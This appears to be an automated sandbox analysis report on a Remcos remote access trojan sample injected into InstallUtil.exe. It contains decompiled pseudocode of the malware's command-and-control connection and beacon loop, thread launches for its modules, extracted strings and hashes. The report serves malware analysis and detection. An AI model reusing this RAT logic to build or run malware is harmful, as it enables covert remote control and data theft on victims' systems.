										__eflags =  *_t194;
										__eflags = 0;
										 *((char*)(_t487 + 1)) = _t388 & 0xffffff00 |  *_t194 != 0x00000000;
										CreateThread(0, 0, E00416832, _t487, 0, 0);
										_t477 = 0x46e600;
									}
									__eflags =  *((intOrPtr*)(E00401F6B(E00401E25(_t477, _t461, _t494, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x46da75 = 1;
										_t183 = E00401F6B(E00401E25(_t477, _t461, _t494, __eflags, 0x25));
										_t185 = E00401F6B(E00401E25(0x46e600, _t461, _t494, __eflags, 0x26));
										_t461 =  *_t183;
										E00401ED3(0x46e0d8,  *_t183, _t183, E00419012( &_v780,  *_t183, _t185));
										E00401EC9();
										__eflags = 0;
										CreateThread(0, 0, E00401BA9, 0, 0, 0);
										_t477 = 0x46e600;
									}
									__eflags =  *((intOrPtr*)(E00401F6B(E00401E25(_t477, _t461, _t494, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t477 = E00401F6B(E00401E25(_t477, _t461, _t494, __eflags, 0x2c));
										_t180 = E004383EC(_t178, E00401F6B(E00401E25(0x46e600, _t461, _t494, __eflags, 0x2d)));
										__eflags =  *_t477;
										_t461 = _t180;
										__eflags =  *_t477 != 0;
										E0040A7ED(_t180);
									}
									_t158 = E00417E20( &_v772, _t461, _t468, __eflags); // executed
									E00401ED3(0x46e60c, _t461, _t477, _t158);
									_t366 =  &_v776;
									E00401EC9();
									_t161 =  *0x46dd0c; // 0x76ec3a30
									_t272 = 0;
									__eflags = _t161;
									if(_t161 != 0) {
										 *_t161(0); // executed
									}
									CreateThread(_t272, _t272, E0040D26E, _t272, _t272, _t272); // executed
									__eflags =  *0x46dd03;
									if( *0x46dd03 != 0) {
										CreateThread(_t272, _t272, E0040FC77, _t272, _t272, _t272);
									}
									__eflags =  *0x46dd58;
									if( *0x46dd58 != 0) {
										CreateThread(_t272, _t272, E00410195, _t272, _t272, _t272);
									}
									_t163 =  *0x46c9c0; // 0x1
									_t164 = _t163 - _t272;
									__eflags = _t164;
									if(__eflags == 0) {
										goto L66;
									} else {
										__eflags = _t164 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L67;
										}
									}
									goto L68;
								} else {
									_t222 = E00401E25(0x46e600, "0", _t494, __eflags, 0xd);
									_t513 = _t505 - 0x18;
									_t460 = _t222;
									E00418385(_t513, _t222);
									_t224 = E0040CF95(__eflags);
									_t505 = _t513 + 0x18;
									__eflags = _t224 - _t274;
									if(__eflags != 0) {
										goto L42;
									} else {
										_t274 = 3;
										goto L40;
									}
								}
							}
						}
					} else {
						_v780 = 0;
						_t457 = E00401F6B(0x46e5a0);
						__eflags = E00410AC0(_t267, "WD",  &_v780);
						if(__eflags != 0) {
							_t461 = E00401F6B(0x46e5a0);
							E00410F1D(_t269, __eflags, "WD");
							E0040FF45();
							L66:
							_push("User");
							L67:
							E004052D4(_t272, _t501 - 0x18, "Access Level: ", _t494, __eflags, E00402053(_t272,  &_v776, _t461, _t494));
							E00402053(_t272, _t501 - 4, "Access Level: ", _t494, "i");
							E00417D02(_t272, _t468);
							_t366 =  &_v784;
							E00401F98(); // executed
							L68:
							E00412503(); // executed
							asm("int3");
							_push(_t477);
							_t484 = _t366 + 0x68;
							E0040D6FF(_t272, _t484, _t484);
							_t289 = _t484;
							 *_t289 = 0x462178;
							 *_t289 = 0x462134;
							return E004320A9(_t289);
						} else {
							goto L6;
						}
					}
				} else {
					_push(__ecx);
					_push(__ecx);
					__ecx =  &_v700;
					__eax = E0040D72E( &_v700, __edx, __eflags, "license_code.txt", 2);
					__ecx = 0x46e600;
					__ecx = E00401E25(0x46e600, __edx, __ebp, __eflags, 0x34);
					__edx = __eax;
					__ecx =  &_v720;
					__eax = E0040EAB2( &_v720, __edx, __eflags);
					__ecx =  &_v720;
					__eax = E0040D6DF( &_v720, __edx, __eflags);
					__ecx =  &_v720;
					L69();
					__ecx =  &_v744;
					E00401F98() = 0;
					__eax = 1;
					__eflags = 1;
					L3:
					return _t92;
				}
			}

0x0040c3e8
0x0040c3e9
0x0040c3fe
0x0040c403
0x0040c406
0x0040c40b
0x0040c415
0x0040c41a
0x0040c424
0x0040c42d
0x0040c432
0x0040c436
0x0040c43f
0x0040c44c
0x0040c452
0x0040c455
0x0040c4ae
0x0040c4cc
0x0040c4cf
0x0040c4eb
0x0040c4f1
0x0040c4f7
0x0040c4ff
0x0040c508
0x0040c511
0x0040c520
0x0040c525
0x0040c52c
0x0040c53d
0x0040c53f
0x0040c546
0x0040c54d
0x0040c552
0x0040c554
0x0040c55b
0x0040c561
0x0040c589
0x0040c58d
0x0040c591
0x0040c596
0x0040c5a2
0x0040c5a4
0x0040c5c3
0x0040c5c5
0x0040c5c7
0x0040c5cf
0x0040c5d6
0x0040c5d6
0x0040c5f3
0x0040c5fc
0x0040c5fe
0x0040c608
0x0040c60a
0x0040c60f
0x0040c5fe
0x0040c621
0x0040c628
0x0040c630
0x0040c634
0x0040c63a
0x0040c640
0x0040c645
0x0040c9a9
0x0040c9ad
0x0040c9b2
0x00000000
0x0040c64b
0x0040c64b
0x0040c65c
0x0040c662
0x0040c667
0x0040c672
0x0040c677
0x0040c680
0x0040c685
0x0040c688
0x0040c690
0x0040c699
0x0040c69e
0x0040c6a7
0x0040c6b0
0x0040c6a9
0x0040c6a9
0x0040c6a9
0x0040c6b5
0x0040c6ba
0x0040c6bf
0x0040c6c1
0x0040c6c5
0x0040c6c5
0x0040c6ca
0x0040c6cf
0x0040c6da
0x0040c6e1
0x0040c6e4
0x0040c6e6
0x0040c6ed
0x0040c6ef
0x0040c6f6
0x0040c71a
0x0040c71c
0x0040c721
0x0040c722
0x0040c724
0x0040c726
0x0040c726
0x0040c6f8
0x0040c6f8
0x0040c6f9
0x0040c6ff
0x0040c702
0x0040c704
0x0040c704
0x0040c702
0x0040c6f6
0x0040c6ed
0x0040c6e4
0x0040c73b
0x0040c73e
0x0040c740
0x0040c740
0x0040c75b
0x0040c774
0x0040c777
0x0040c78e
0x0040c791
0x0040c7a8
0x0040c7ab
0x0040c7be
0x0040c7c1
0x0040c7da
0x0040c7dc
0x0040c7e9
0x0040c7f2
0x0040c7fb
0x0040c800
0x0040c813
0x0040c81c
0x0040c81c
0x0040c7dc
0x0040c821
0x0040c826
0x0040c9c9
0x0040c9d8
0x0040c9e0
0x0040c9fe
0x0040ca00
0x0040ca05
0x0040ca15
0x0040ca1a
0x00000000
0x0040c82c
0x0040c82c
0x0040c833
0x0040c8c9
0x0040c839
0x0040c844
0x0040c85b
0x0040c86b
0x0040c86d
0x0040c872
0x0040c87a
0x0040c880
0x0040c885
0x0040c898
0x0040c8b2
0x0040c8b9
0x0040c8bc
0x0040c8bc
0x0040c8d5
0x0040c8df
0x0040c8e7
0x0040c8e9
0x0040c8ea
0x0040c8f3
0x0040c8f6
0x0040c8f8
0x0040c90b
0x0040c90b
0x0040c8fa
0x0040c901
0x0040c906
0x0040c906
0x0040c916
0x0040c923
0x0040c92b
0x0040c936
0x0040c955
0x0040c95b
0x0040c960
0x0040c963
0x0040c96c
0x0040c971
0x0040c97d
0x0040c97f
0x0040ca1f
0x0040ca1f
0x0040ca2b
0x0040ca30
0x0040ca36
0x0040ca3b
0x0040ca4a
0x0040ca4c
0x0040ca51
0x0040ca65
0x0040ca70
0x0040ca76
0x0040ca78
0x0040ca7e
0x0040ca80
0x0040ca82
0x0040ca82
0x00000000
0x0040ca82
0x0040ca7a
0x0040ca7a
0x0040ca84
0x0040ca84
0x0040ca89
0x0040ca95
0x0040ca95
0x0040ca97
0x0040caa1
0x0040caa6
0x0040cab0
0x0040cab5
0x0040caba
0x0040cac8
0x0040cada
0x0040caec
0x0040caf1
0x0040caf6
0x0040cb13
0x0040cb25
0x0040cb44
0x0040cb5c
0x0040cb5e
0x0040cba6
0x0040cb60
0x0040cb62
0x0040cb69
0x0040cb73
0x0040cb7b
0x0040cb7d
0x0040cb82
0x0040cb88
0x0040cb9a
0x0040cb9d
0x0040cb9f
0x0040cb9f
0x0040cbbc
0x0040cbbe
0x0040cbc2
0x0040cbc9
0x0040cbd3
0x0040cbda
0x0040cbdc
0x0040cbe1
0x0040cbe7
0x0040cbf3
0x0040cbf6
0x0040cbf8
0x0040cbf8
0x0040cc0d
0x0040cc0f
0x0040cc15
0x0040cc22
0x0040cc37
0x0040cc3c
0x0040cc4f
0x0040cc58
0x0040cc5d
0x0040cc69
0x0040cc6b
0x0040cc6b
0x0040cc80
0x0040cc82
0x0040cc9b
0x0040ccaa
0x0040ccaf
0x0040ccb2
0x0040ccb5
0x0040ccb8
0x0040ccb8
0x0040ccc1
0x0040cccc
0x0040ccd1
0x0040ccd5
0x0040ccda
0x0040ccdf
0x0040cce1
0x0040cce3
0x0040cce6
0x0040cce6
0x0040ccf2
0x0040ccf4
0x0040ccfb
0x0040cd07
0x0040cd07
0x0040cd09
0x0040cd10
0x0040cd1c
0x0040cd1c
0x0040cd1e
0x0040cd23
0x0040cd23
0x0040cd25
0x00000000
0x0040cd27
0x0040cd27
0x0040cd2a
0x0040cd2c
0x00000000
0x0040cd2c
0x0040cd2a
0x00000000
0x0040c985
0x0040c989
0x0040c98e
0x0040c991
0x0040c995
0x0040c99a
0x0040c99f
0x0040c9a2
0x0040c9a4
0x00000000
0x0040c9a6
0x0040c9a8
0x00000000
0x0040c9a8
0x0040c9a4
0x0040c97f
0x0040c826
0x0040c563
0x0040c567
0x0040c578
0x0040c581
0x0040c583
0x0040cd3f
0x0040cd41
0x0040cd4b
0x0040cd50
0x0040cd50
0x0040cd55
0x0040cd69
0x0040cd78
0x0040cd7d
0x0040cd85
0x0040cd89
0x0040cd8e
0x0040cd8e
0x0040cd93
0x0040cd94
0x0040cd95
0x0040cd9a
0x0040cd9f
0x0040e252
0x0040c2b0
0x0040c2bc
0x00000000
0x00000000
0x00000000
0x0040c583
0x0040c457
0x0040c457
0x0040c458
0x0040c460
0x0040c464
0x0040c46b
0x0040c475
0x0040c47c
0x0040c47e
0x0040c482
0x0040c487
0x0040c48b
0x0040c490
0x0040c494
0x0040c499
0x0040c4a2
0x0040c4a4
0x0040c4a4
0x0040c4a5
0x0040c4ab
0x0040c4ab

APIs

OpenMutexA.KERNEL32 ref: 0040C5BD
WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C5CF
CloseHandle.KERNEL32(00000000), ref: 0040C5D6

Part of subcall function 0040EAB2: __EH_prolog.LIBCMT ref: 0040EAB7

Strings

Access Level: , xrefs: 0040CD61
User, xrefs: 0040CD50
Cv, xrefs: 0040CB82
license_code.txt, xrefs: 0040C45B
Administrator, xrefs: 0040CD2C
licence, xrefs: 0040CA3B
(64 bit), xrefs: 0040C6A9
Exe, xrefs: 0040C516
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, xrefs: 0040C655, 0040C8BF
Software\, xrefs: 0040C4DC
Exe, xrefs: 0040C51B
0:v@O-t, xrefs: 0040CCDA
Inj, xrefs: 0040C5E0, 0040C5EB, 0040C600
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040C66D
Remcos Agent initialized, xrefs: 0040CA9C
origmsc, xrefs: 0040C70B
Remcos, xrefs: 0040C756
ProductName, xrefs: 0040C668
exepath, xrefs: 0040C949, 0040C9F4
(32 bit), xrefs: 0040C6B0

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseH_prologHandleMutexObjectOpenSingleWait
String ID: (32 bit)$ (64 bit)$0:v@O-t$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe$Exe$Exe$Inj$ProductName$Remcos$Remcos Agent initialized$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$exepath$licence$license_code.txt$origmsc$Cv
API String ID: 46554527-3425213474
Opcode ID: 33a8a3d6da3b889eb178367c5ea9bf29c9078ddf528fc83aed4e7b77ade77523
Instruction ID: 56d1e19bc8dcb5b9211f51e228283d429f534a44c8a0b5fcf6a0cae10bb52002
Opcode Fuzzy Hash: 33a8a3d6da3b889eb178367c5ea9bf29c9078ddf528fc83aed4e7b77ade77523
Instruction Fuzzy Hash: D8329260B043416BDA1577729CA7B7E26994F85748F14083FF542BB2E2EEBC8C45839E

Uniqueness

Uniqueness Score: -1.00%

Function 00412503 Relevance: 34.0, APIs: 5, Strings: 14, Instructions: 758
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00412503() {
				char _v16;
				char _v40;
				char _v64;
				char _v76;
				char _v100;
				char _v112;
				void* _v135;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				char _v496;
				char _v520;
				char _v544;
				char _v568;
				char _v592;
				char _v616;
				char _v640;
				char _v664;
				char _v688;
				char _v712;
				char _v736;
				char _v760;
				char _v784;
				char _v808;
				char _v832;
				char _v856;
				char _v880;
				char _v904;
				char _v928;
				char _v952;
				char _v976;
				char _v1000;
				char _v1024;
				char _v1048;
				char _v1072;
				char _v1096;
				char _v1120;
				char _v1144;
				char _v1168;
				char _v1192;
				char _v1216;
				char _v1240;
				char _v1264;
				char _v1288;
				char _v1312;
				char _v1336;
				char _v1360;
				char _v1384;
				char _v1408;
				char _v1432;
				char _v2436;
				signed int _t164;
				void* _t166;
				long _t171;
				void* _t173;
				void* _t176;
				void* _t184;
				char* _t195;
				void* _t197;
				void* _t198;
				struct _SECURITY_ATTRIBUTES* _t199;
				struct _SECURITY_ATTRIBUTES* _t201;
				void* _t203;
				long _t208;
				void* _t209;
				void* _t210;
				void* _t224;
				void* _t232;
				void* _t233;
				struct _SECURITY_ATTRIBUTES* _t236;
				intOrPtr* _t237;
				void* _t240;
				void* _t241;
				void* _t242;
				void* _t245;
				void* _t247;
				void* _t250;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t255;
				void* _t256;
				void* _t257;
				intOrPtr* _t352;
				void* _t367;
				void* _t373;
				void* _t375;
				void* _t377;
				void* _t379;
				char* _t381;
				void* _t383;
				long _t385;
				void* _t386;
				struct _SECURITY_ATTRIBUTES* _t387;
				char* _t415;
				void* _t634;
				void* _t646;
				void* _t699;
				signed short _t701;
				void* _t709;
				void* _t710;
				void* _t711;
				void* _t712;
				void* _t713;
				void* _t714;
				void* _t715;
				void* _t716;
				void* _t717;
				void* _t718;
				void* _t719;
				void* _t720;
				void* _t724;
				void* _t725;
				void* _t726;
				void* _t727;
				void* _t728;
				void* _t729;
				void* _t730;
				void* _t731;
				void* _t732;
				long _t734;

				_push(_t386);
				_push(_t703);
				E0040209F(_t386,  &_v100);
				E0041804F( &_v256, _t634);
				E0040209F(_t386,  &_v1432);
				_t699 = 0x46e600;
				_t164 = E004383EC(_t162, E00401F6B(E00401E25(0x46e600, _t634, _t709, _t732, 0x29)));
				if(_t164 != 0) {
					_t385 = _t164 * 0x3e8;
					_t734 = _t385;
					Sleep(_t385);
				}
				_t711 = _t710 - 0x18;
				E00402053(_t386, _t711, _t634, _t709, 0x467228);
				_t166 = E00401E25(_t699, _t634, _t709, _t734, 0);
				_t712 = _t711 - 0x18;
				E004020B6(_t386, _t712, _t634, _t734, _t166);
				E0041851D( &_v76, _t634);
				_t713 = _t712 + 0x30;
				_t387 = 0; // executed
				E00404875(); // executed
				E00401E25(_t699, _t634, _t709, _t734, 0x3a);
				_t635 = 0x461084;
				_t171 = E0040ECD0(_t734);
				_t735 = _t171;
				if(_t171 != 0) {
					E00401E25(_t699, 0x461084, _t709, _t735, 0x3a);
					_t373 = E0040243C();
					_t375 = E00401F6B(E00401E25(_t699, 0x461084, _t709, _t735, 0x3a));
					E00401E25(_t699, 0x461084, _t709, _t735, 0x39);
					_t377 = E0040243C();
					_t379 = E00401F6B(E00401E25(_t699, 0x461084, _t709, _t735, 0x39));
					E00401E25(_t699, 0x461084, _t709, _t735, 0x38);
					_t381 = E0040243C();
					_t703 = _t381;
					_t383 = E00401F6B(E00401E25(_t699, _t635, _t709, _t735, 0x38));
					_t635 = _t381;
					E004046FD(_t383, _t381, _t709, _t379, _t377, _t375, _t373);
					_t713 = _t713 + 0x10;
				}
				L4:
				_t714 = _t713 - 0x18;
				 *0x46e881 = 1;
				E00402053(_t387, _t714, _t635, _t709, 0x46722c);
				_t173 = E00401E25( &_v76, _t635, _t709, _t735, _t387);
				_t715 = _t714 - 0x18;
				E004020B6(_t387, _t715, _t635, _t735, _t173);
				E0041851D( &_v16, _t635);
				_t716 = _t715 + 0x30;
				_t176 = E00401E25( &_v16, _t635, _t709, _t735, 1);
				E00401FA2(0x46e884, _t178, _t703, E00402ED0(_t387,  &_v40, E0040795C( &_v64, E00401E25( &_v16, _t635, _t709, _t735, 0), _t709, 0x46722c), _t709, _t735, _t176));
				E00401F98();
				E00401F98();
				E00401E25( &_v16, _t178, _t709, _t735, 2);
				_t638 = "0";
				_t184 = E00405ADC("0");
				_t415 =  &_v100;
				_t736 = _t184;
				if(_t184 == 0) {
					 *0x46dad4 = 1;
					_push("TLS On ");
				} else {
					 *0x46dad4 = 0;
					_push("TLS Off");
				}
				L00405A7D(_t387, _t415, _t638);
				_t717 = _t716 - 0x18;
				E00402ED0(_t387, _t717, E0040793B(_t387,  &_v40, E004052F5( &_v64, "Connecting  | ", _t709,  &_v100), _t699, _t709, _t736, " | "), _t709, _t736, 0x46e884);
				_t718 = _t717 - 0x14;
				E00402053(_t387, _t718, _t188, _t709, "i");
				E00417D02(_t387, _t699);
				_t713 = _t718 + 0x30;
				E00401F98();
				E00401F98();
				_t195 = E00401F6B(E00401E25( &_v16, _t188, _t709, _t736, 1));
				_t197 = E00401F6B(E00401E25( &_v16, _t188, _t709, _t736, 0));
				_t635 = _t195;
				_t198 = E004124C2(_t197, _t195,  &_v64,  &_v64);
				_t737 = _t198;
				if(_t198 == 0) {
					_t703 = 0x46e850;
					_t199 = E00404804(0x46e850);
					__eflags = _t199;
					if(_t199 != 0) {
						E00404F28(0x46e850, 0x3c, 0); // executed
						_t201 = E0040489F(0x46e850, 0x46e850, 0x46e850); // executed
						__eflags = _t201;
						if(__eflags != 0) {
							_t209 = E00401E25( &_v16, _t635, _t709, __eflags, 1);
							_t719 = _t713 - 0x18;
							_t210 = E00401E25( &_v16, _t635, _t709, __eflags, 0);
							_t646 = E0040793B(_t387,  &_v64, E00402ED0(_t387,  &_v184, E0040793B(_t387,  &_v208, E004052F5( &_v232, "Connected   | ", _t709,  &_v100), _t699, _t709, __eflags, " | "), _t709, __eflags, _t210), _t699, _t709, __eflags, 0x46722c);
							E00402ED0(_t387, _t719, _t646, _t709, __eflags, _t209);
							_t720 = _t719 - 0x14;
							E00402053(_t387, _t720, _t646, _t709, "i");
							E00417D02(_t387, _t699);
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							_v136 = 0;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_t224 = E00417F7C( &_v232);
							_push(_t646);
							E00411B96( &_v136, "%I64u", _t224);
							E0040773A(_t387,  &_v40, _t646, __eflags, 0x46e408);
							E0043DDD1( &_v40,  *0x46c9c0,  &_v112, 0xa);
							E004020B6(_t387,  &_v160, _t646, __eflags, E00401E25(0x46e600, _t646, _t709, __eflags, 1));
							_t232 = E0040243C();
							_t233 = E00401F6B(0x46e5e8);
							_t647 = E00401F6B(0x46e5a0);
							_t236 = E00410C6B(_t235, "name",  &_v2436, 0x104, _t233, _t232);
							_t724 = _t720 + 0x60;
							__eflags = _t236;
							if(_t236 != 0) {
								L00405A7D(_t387,  &_v160, _t647,  &_v2436);
							}
							_t237 =  *0x46dd3c; // 0x0
							_t701 = 0;
							__eflags = _t237;
							if(_t237 != 0) {
								_t701 =  *_t237() & 0x0000ffff;
							}
							E0040413E(_t387,  &_v64, _t647, _t709, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe");
							_t725 = _t724 - 0x18;
							_t240 = E00418445(_t387,  &_v1408, 0x46e588);
							_t241 = E004182D1(_t387,  &_v1384, _t701 & 0x0000ffff);
							_t242 = E00401E25( &_v16, _t701 & 0x0000ffff, _t709, __eflags, 0);
							_t245 = E004182D1(_t387,  &_v1360, GetTickCount());
							_t247 = E004182D1(_t387,  &_v1336, E00418281( &_v1360));
							_t250 = E00418445(_t387,  &_v1288, E00418232(_t387,  &_v1312));
							_t251 = E00418445(_t387,  &_v1264, 0x46e0d8);
							_t252 = E00418445(_t387,  &_v1240,  &_v64);
							_t253 = E00418445(_t387,  &_v1216,  &_v40);
							_t255 = E00418445(_t387,  &_v1192, 0x46e968);
							_t256 = E0040D39C( &_v1168);
							_t257 = E00418445(_t387,  &_v1144, 0x46e60c);
							_t635 = E00402ED0(_t387,  &_v232, E00402ED0(_t387,  &_v208, E00402ED0(_t387,  &_v184, E00402E61( &_v280, E00402ED0(_t387,  &_v304, E00402E61( &_v328, E00402ED0(_t387,  &_v352, E00402ED0(_t387,  &_v376, E00402ED0(_t387,  &_v400, E00402ED0(_t387,  &_v424, E00402ED0(_t387,  &_v448, E0040793B(_t387,  &_v472, E00402ED0(_t387,  &_v496, E00402E61( &_v520, E00402ED0(_t387,  &_v544, E00402E61( &_v568, E00402ED0(_t387,  &_v592, E0040799E(_t387,  &_v616, E00402ED0(_t387,  &_v640, E00402E61( &_v664, E00402ED0(_t387,  &_v688, E00402E61( &_v712, E00402ED0(_t387,  &_v736, E00402E61( &_v760, E00402ED0(_t387,  &_v784, E00402E61( &_v808, E00402ED0(_t387,  &_v832, E0040793B(_t387,  &_v856, E00402ED0(_t387,  &_v880, E0040793B(_t387,  &_v904, E00402ED0(_t387,  &_v928, E00402E61( &_v952, E00402ED0(_t387,  &_v976, E00402ED0(_t387,  &_v1000, E00402ED0(_t387,  &_v1024, E00402E61( &_v1048, E00402ED0(_t387,  &_v1072, E00402E61( &_v1096, E00402EF1( &_v1120,  &_v160, _t709, 0x46e260), _t257), _t709, __eflags, 0x46e260), _t256), _t709, __eflags, 0x46e260), _t709, __eflags, 0x46e63c), _t709, __eflags, 0x46e260), _t255), _t709, __eflags, 0x46e260), 0x46e260, _t709, __eflags,  &_v136), _t709, __eflags, 0x46e260), 0x46e260, _t709, __eflags, "3.5.1 Pro"), _t709, __eflags, 0x46e260), _t253), _t709, __eflags, 0x46e260), _t252), _t709, __eflags, 0x46e260), _t251), _t709, __eflags, 0x46e260), _t250), _t709, __eflags, 0x46e260), 0x46e260, _t709, __eflags,  *0x46c9c4 & 0x000000ff), _t709, __eflags, 0x46e260), _t247), _t709, __eflags, 0x46e260), _t245), _t709, __eflags, 0x46e260), 0x46e260, _t709, __eflags,  &_v112), _t709, __eflags, 0x46e260), _t709, __eflags, _t242), _t709, __eflags, 0x46e260), _t709, __eflags, 0x46e5d0), _t709, __eflags, 0x46e260), _t241), _t709, __eflags, 0x46e260), _t240), _t709, __eflags, 0x46e260), _t709, __eflags,  &_v256), _t709, __eflags, 0x46e260);
							E00402ED0(_t387, _t725, _t296, _t709, __eflags, "Exe");
							_t703 = 0x46e850;
							_push(0x4b);
							E00404A78(0x46e850, _t296, __eflags);
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401EC9();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401EC9();
							E00404BE7(0x46e850, _t296, 0x412ff8, 1);
							_t352 =  *0x46dd40; // 0x0
							__eflags = _t352;
							if(_t352 != 0) {
								__eflags =  *0x46dd02;
								if( *0x46dd02 != 0) {
									_t352 =  *_t352();
									 *0x46dd02 = 0;
								}
							}
							__eflags =  *0x46e3f2;
							if( *0x46e3f2 != 0) {
								_t352 = E004096DC(_t387, 0x46e3a8, _t635);
							}
							E00405A42(_t352);
							_t726 = _t725 - 0x18;
							E00402053(_t387, _t726, _t635, _t709, "Disconnected");
							_t727 = _t726 - 0x18;
							E00402053(_t387, _t727, _t635, _t709, "!");
							E00417D02(_t387, 0x46e260);
							_t713 = _t727 + 0x30;
							__eflags =  *0x46de98;
							if( *0x46de98 != 0) {
								__eflags = 0;
								CreateThread(0, 0, E00417595, 0, 0, 0);
							}
							E00401F98();
							E00401EC9();
							_t699 = 0x46e600;
						}
					} else {
						_t728 = _t713 - 0x18;
						E00402053(_t387, _t728, _t635, _t709, "Connection Error: Unable to create socket");
						_t729 = _t728 - 0x18;
						E00402053(_t387, _t729, _t635, _t709, "E");
						E00417D02(_t387, _t699);
						_t713 = _t729 + 0x30;
					}
				} else {
					__imp__#111();
					_t367 = E0041925A( &_v40, _t198); // executed
					_t730 = _t713 - 0x18;
					_t635 = "Connection Error: ";
					E004052D4(_t387, _t730, "Connection Error: ", _t709, _t737, _t367);
					_t731 = _t730 - 0x14;
					E00402053(_t387, _t731, "Connection Error: ", _t709, "E");
					E00417D02(_t387, _t699);
					_t713 = _t731 + 0x30;
					E00401F98();
					_t703 = 0x46e850;
				}
				E00404DFD(_t635);
				_t387 =  &(_t387->nLength);
				_t203 = E004021BA( &_v76);
				_t738 = _t387 - _t203;
				if(_t387 >= _t203) {
					_t387 = 0;
					_t208 = E004383EC(_t205, E00401F6B(E00401E25(_t699, _t635, _t709, _t738, 2))) * 0x3e8;
					_t735 = _t208;
					Sleep(_t208); // executed
				}
				E00401E4D( &_v16, _t635);
				goto L4;
			}

0x0041250f
0x00412510
0x00412512
0x0041251d
0x00412528
0x0041252d
0x00412543
0x0041254b
0x0041254d
0x0041254d
0x00412554
0x00412554
0x0041255a
0x00412564
0x0041256d
0x00412572
0x00412578
0x00412580
0x00412585
0x00412588
0x0041258a
0x00412593
0x00412598
0x0041259f
0x004125a4
0x004125a6
0x004125ac
0x004125b3
0x004125c4
0x004125ce
0x004125d5
0x004125e6
0x004125f0
0x004125f7
0x00412600
0x00412609
0x0041260e
0x00412612
0x00412617
0x00412617
0x0041261a
0x0041261a
0x0041261d
0x0041262b
0x00412634
0x00412639
0x0041263f
0x00412647
0x0041264c
0x00412654
0x00412685
0x0041268d
0x00412695
0x0041269f
0x004126a4
0x004126ab
0x004126b0
0x004126b3
0x004126b5
0x004126c5
0x004126cc
0x004126b7
0x004126b7
0x004126be
0x004126be
0x004126d1
0x004126d6
0x00412706
0x0041270b
0x00412715
0x0041271a
0x0041271f
0x00412725
0x0041272d
0x00412740
0x00412753
0x00412758
0x0041275c
0x00412761
0x00412763
0x004127ae
0x004127b5
0x004127ba
0x004127bc
0x004127ef
0x004127f7
0x004127fc
0x004127fe
0x00412809
0x0041280e
0x0041281e
0x00412865
0x00412869
0x0041286e
0x00412878
0x0041287d
0x00412888
0x00412893
0x0041289e
0x004128a9
0x004128ae
0x004128bd
0x004128be
0x004128bf
0x004128c0
0x004128c1
0x004128c2
0x004128c7
0x004128d5
0x004128e5
0x004128f6
0x00412911
0x0041291d
0x00412925
0x00412946
0x00412948
0x0041294d
0x00412950
0x00412952
0x00412961
0x00412961
0x00412966
0x0041296b
0x0041296d
0x0041296f
0x00412973
0x00412973
0x0041297e
0x00412983
0x004129a6
0x004129ba
0x004129d1
0x004129eb
0x004129ff
0x00412a22
0x00412a34
0x00412a44
0x00412a54
0x00412a74
0x00412a87
0x00412a99
0x00412cc6
0x00412cca
0x00412cd0
0x00412cd5
0x00412cd9
0x00412ce4
0x00412cef
0x00412cfa
0x00412d05
0x00412d10
0x00412d1b
0x00412d26
0x00412d31
0x00412d3c
0x00412d47
0x00412d52
0x00412d5d
0x00412d68
0x00412d73
0x00412d7e
0x00412d89
0x00412d94
0x00412d9f
0x00412daa
0x00412db5
0x00412dc0
0x00412dcb
0x00412dd6
0x00412de1
0x00412dec
0x00412df7
0x00412e02
0x00412e0d
0x00412e18
0x00412e23
0x00412e2e
0x00412e39
0x00412e44
0x00412e4f
0x00412e5a
0x00412e65
0x00412e70
0x00412e7b
0x00412e86
0x00412e91
0x00412e9c
0x00412ea7
0x00412eb2
0x00412ebd
0x00412ec8
0x00412ed3
0x00412ede
0x00412ee9
0x00412ef4
0x00412eff
0x00412f0a
0x00412f12
0x00412f20
0x00412f25
0x00412f2a
0x00412f2c
0x00412f2e
0x00412f35
0x00412f37
0x00412f39
0x00412f39
0x00412f35
0x00412f40
0x00412f47
0x00412f4e
0x00412f4e
0x00412f53
0x00412f58
0x00412f62
0x00412f67
0x00412f71
0x00412f76
0x00412f7b
0x00412f7e
0x00412f85
0x00412f87
0x00412f93
0x00412f93
0x00412f9f
0x00412fa7
0x00412fac
0x00412fac
0x004127be
0x004127be
0x004127c8
0x004127cd
0x004127d7
0x004127dc
0x004127e1
0x004127e1
0x00412765
0x00412765
0x00412770
0x00412775
0x00412778
0x00412780
0x00412785
0x0041278f
0x00412794
0x00412799
0x0041279f
0x004127a4
0x004127a4
0x00412fb3
0x00412fbb
0x00412fbc
0x00412fc1
0x00412fc3
